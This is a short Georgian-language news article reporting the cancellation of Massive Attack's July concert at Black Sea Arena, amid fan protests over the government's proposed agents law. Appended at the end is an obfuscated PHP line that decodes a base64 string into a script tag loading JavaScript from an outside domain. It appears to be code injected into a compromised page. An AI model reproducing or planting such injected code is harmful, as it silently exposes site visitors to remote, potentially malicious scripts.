celsiusi
ავერსი შნაიდერი

28 ივლისს, Black Sea Arena-ზე დაგეგმილი MASSIVE ATTACK-ის კონცერტი გაუქმებულია.

„ბლექ სი არენას“ ცნობით, კონცერტი „გაუთვალისწინებელი გარემოებების გამო“ გაუქმდა და ბილეთის მფლობელებს გადახდილი თანხა აუნაზღაურდებათ ეტაპობრივად.

Black Sea Arena-ზე ბრიტანულ ჯგუფ Massive Attack-ის კონცერტი 28 ივლისს უნდა გამართულიყო.

ღონისძიების დაანონსებიდან მალევე ქართველმა მსმენელებმა Massive Attack-ს სოციალურ ქსელებში მისწერეს, რომ გადაეხედათ მათი თანამშრომლობისთვის საქართველოს „მჩაგვრელ მთავრობასთან“, რომელიც ამ ღონისძიების დაფინანსების პარალელურად ცდილობდა რეპრესიული აგენტების კანონის მიღებას.

3 მაისს Massive Attack-მა სოციალურ ქსელ X-ში გამოაქვეყნა თბილისში, ანტირუსულ აქციებზე გადაღებული ფოტო და დაწერა:

„სოლიდარობა სტუდენტებს – თბილისიდან აშშ-ის კამპუსებამდე – რომლებიც ეწინააღმდეგებიან ძალადობრივ სახელმწიფო რეპრესიებს“.

308
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");